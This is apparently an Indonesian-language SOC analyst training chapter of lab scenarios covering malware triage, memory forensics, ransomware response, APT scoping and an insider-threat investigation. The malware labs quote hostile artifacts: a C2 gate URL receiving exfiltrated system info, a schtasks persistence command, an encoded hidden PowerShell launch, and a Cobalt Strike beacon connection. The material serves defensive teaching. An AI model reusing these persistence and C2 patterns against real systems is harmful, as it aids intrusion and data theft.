L2 Advanced Hands-On

BAB 9 L2 HANDS-ON SCENARIOS

09

Lab: Malware Triage

Skenario: EDR mendeteksi file mencurigakan di endpoint. L1 sudah memvalidasi sebagai TP dan mengisolasi host. Kamu sebagai L2 diminta melakukan malware triage.

Step 1: Collect Artifact

# Ambil file dari quarantine EDR atau endpoint File: update_service.exe Location: C:\Users\Public\Downloads\ Size: 847 KB SHA256: 3a7b9c2d...

Step 2: Static Analysis

# Hash lookup VirusTotal: 52/71 deteksi → "Trojan.Emotet" # File metadata Compile time: 2 hari lalu (fresh compile targeted?) Packer: UPX detected → unpack dulu: upx -d update_service.exe # Strings analysis (setelah unpack) strings output: "http://193.42.xx.xx/gate.php" ← C2 URL "Content-Type: multipart/form-data" ← Data exfil via HTTP POST "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ← Persistence "cmd.exe /c schtasks /create" ← Scheduled task persistence # PE Imports InternetOpenA, HttpSendRequestA ← HTTP C2 RegSetValueExA ← Registry persistence CreateToolhelp32Snapshot ← Process enumeration

Step 3: Dynamic Analysis (Sandbox)

# Any.run/sandbox results: Process Tree: update_service.exe ├── cmd.exe → schtasks.exe /create /tn "UpdateSvc" /tr "C:\Users\Public\update_service.exe" /sc minute /mo 5 └── rundll32.exe → injected into svchost.exe Network: DNS: api-update.servegame[.]com → 193.42.xx.xx HTTP POST to 193.42.xx.xx/gate.php (every 60s = beacon interval) HTTP POST body contains: base64-encoded system info File System: Created: C:\Users\Public\update_service.exe (copy to persist location) Modified: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc Anti-Analysis: Checks for vmtoolsd.exe, VBoxService.exe (VM detection) Sleep(120000) before C2 communication (2 min delay)

Step 4: IOC Extraction & Actions

IOC LIST: Hash: 3a7b9c2d... (SHA256) IP: 193.42.xx.xx Domain: api-update.servegame[.]com URL: http://193.42.xx.xx/gate.php File: C:\Users\Public\update_service.exe RegKey: HKCU\...\Run\UpdateSvc Task: UpdateSvc (scheduled task) ACTIONS: 1. Block IP + domain di firewall & DNS 2. Hunt: cari IOC di seluruh environment (SIEM + EDR) 3. Eradicate: remove file, registry key, scheduled task 4. Write YARA rule untuk deteksi varian 5. Create Sigma rule untuk deteksi behavioral pattern 6. Update SIEM correlation rules 7. Share IOC via MISP/TIP

Lab: Memory Forensics Investigation

Skenario: Endpoint menunjukkan aktivitas C2 tapi EDR/AV tidak mendeteksi malware di disk. Suspect fileless malware. Memory dump diambil sebelum isolasi.
# Step 1: Process listing cari anomali vol3 -f infected.raw windows.pstree # Temuan suspicious: PID PPID Name Path ... 4892 3204 powershell.exe ← spawned by WINWORD.EXE (PID 3204) 5120 4892 rundll32.exe ← spawned by PowerShell 5344 5120 svchost.exe ← spawned by rundll32 ABNORMAL! # Normal svchost parent = services.exe, bukan rundll32! # Step 2: Check command line vol3 -f infected.raw windows.cmdline --pid 4892 powershell.exe -nop -w hidden -enc SQBFAF... # Step 3: Check injected code vol3 -f infected.raw windows.malfind --pid 5344 Process: svchost.exe PID: 5344 VadTag: PAGE_EXECUTE_READWRITE ← RWX permission = code injection! MZ header found in injected memory region → PE injected into svchost # Step 4: Dump injected code vol3 -f infected.raw windows.malfind --pid 5344 --dump # Submit dumped PE to VirusTotal → "Cobalt Strike Beacon" # Step 5: Network connections dari suspicious process vol3 -f infected.raw windows.netscan | grep 5344 svchost.exe 5344 TCP 10.0.0.55:49832 → 198.51.100.33:443 ESTABLISHED ← C2 connection from injected svchost!

Kesimpulan

Attack Chain: Word macro → PowerShell (encoded) → rundll32 (loader) → Process Injection into svchost.exe → Cobalt Strike Beacon → C2 communication via HTTPS. Fileless: Payload hanya ada di memory, tidak pernah ditulis ke disk → AV tradisional tidak bisa mendeteksi.

Lab: Ransomware Incident Response

Skenario: Jam 03:00 AM, monitoring alert menunjukkan multiple file servers mengalami mass file rename dengan extension .lockbit3. Ransom note ditemukan di setiap direktori.

Immediate Actions (First 30 Minutes)

PRIORITY 1: STOP THE SPREAD ├── Isolasi semua affected servers dari network SEGERA ├── Disable affected service accounts ├── Block lateral movement: disable SMB (port 445) antar server jika possible ├── DO NOT shutdown preserve memory evidence └── Take memory dump dari affected servers PRIORITY 2: SCOPE ASSESSMENT ├── Berapa server terdampak? ├── Data apa yang terenkripsi? ├── Apakah backup terpengaruh? (backup servers sering jadi target!) ├── Apakah domain controller compromised? └── Ada indikasi data exfiltration sebelum enkripsi? (double extortion)

Investigation

# Cek initial access kapan attacker pertama masuk? SIEM query: Cari login anomalies 7-30 hari sebelum enkripsi # Ransomware biasanya di-deploy setelah attacker sudah di jaringan berhari-hari # Cek lateral movement path Event 4648 + Event 4624 Type 3/10 dari host pertama yang terinfeksi # Bangun timeline: Host A → Host B → DC → File Servers # Cek persistence & tools Event 7045 (service install) → PsExec, ransomware service Event 4698 (scheduled task) → scheduled deployment Event 1102 (log cleared) → anti-forensics # Cek data exfiltration (pre-encryption) Proxy/FW logs: Cari large upload ke cloud storage, FTP, atau IP asing DNS logs: Cari DNS tunneling patterns # Ransom note analysis Ransomware family: LockBit 3.0 Decryptor: Cek nomoreransom.org mungkin ada free decryptor Payment: JANGAN bayar tanpa konsultasi legal & manajemen

Recovery Decision Tree

Kondisi Aksi
Backup ada & bersih Restore dari backup setelah eradication & hardening
Backup terenkripsi juga Check offline backups, cloud backups, shadow copies
Free decryptor tersedia Cek nomoreransom.org, vendor security advisories
Tidak ada opsi recovery Konsultasi management & legal tentang opsi (termasuk negosiasi terakhir resort)

Lab: APT Investigation

Skenario: Threat intel team menerima laporan bahwa IP address yang terkait APT group sedang aktif menargetkan industri kamu. Ditemukan bahwa satu endpoint sudah berkomunikasi dengan IP tersebut selama 2 minggu.

Investigation Approach

PHASE 1: SCOPE (Don't alert the adversary) ├── Cari SEMUA endpoint yang connect ke C2 IP (SIEM + netflow) ├── Cek DNS logs: domain lain yang resolve ke IP tersebut ├── EDR: query semua endpoint untuk IOC terkait (file hash, mutex, pipe names) ├── Jangan isolasi dulu kita perlu tahu full scope sebelum containment └── APT attacker mungkin punya backup C2 jika kita block satu, mereka pindah PHASE 2: TIMELINE RECONSTRUCTION ├── Initial access: kapan pertama kali? (proxy logs, email logs) ├── Lateral movement: host mana saja yang dikunjungi? ├── Persistence: mekanisme apa yang dipasang? ├── Credential access: account mana yang di-compromise? ├── Collection: data apa yang diakses/dikumpulkan? └── Exfiltration: sudah ada data yang keluar? PHASE 3: COORDINATED CONTAINMENT # APT containment harus simultan jika attacker sadar, mereka bisa: # - Destroy evidence # - Switch to backup C2 # - Deploy destructive malware # - Accelerate exfiltration ├── Block ALL known C2 (IP, domain, JA3 hash) secara simultan ├── Isolasi ALL compromised endpoints bersamaan ├── Reset ALL potentially compromised credentials ├── Disable ALL persistence mechanisms └── Engage external IR firm jika needed (APT = serius)

Lab: Insider Threat Investigation

Skenario: HR melaporkan bahwa seorang senior engineer yang akan resign terdeteksi oleh DLP mengakses repository code yang bukan milik timnya dan mengunduh file ke USB drive.

Investigation (Koordinasi dengan HR & Legal)

EVIDENCE COLLECTION: # 1. DLP Logs USB Device: SanDisk Ultra (Serial: XXX) Files copied: 47 files, 2.3 GB total File types: .py, .yaml, .pem, .env, .sql Timestamp: After hours (21:00-22:30) # 2. Code Repository Access Logs Accessed repos outside normal scope: - /product-alpha/ml-models (AI/ML intellectual property) - /infrastructure/secrets-vault (credential store!) - /finance/pricing-engine Normal access: /backend/api-service only # 3. Email/Communication Review (dengan approval Legal) Sent emails to personal address with attachments? → Check email gateway logs Cloud upload activity? → Check proxy for personal Drive/Dropbox # 4. Badge/Physical Access After-hours building access on dates matching DLP alerts IMPORTANT RULES: ✗ JANGAN konfrontasi employee langsung HR/Legal responsibility ✗ JANGAN akses personal email/device tanpa legal approval ✗ DO preserve all evidence with chain of custody ✗ DO document everything objectively facts only, no assumptions ✗ DO coordinate timing of account disable dengan HR (exit interview)
← Beranda Bab Selanjutnya →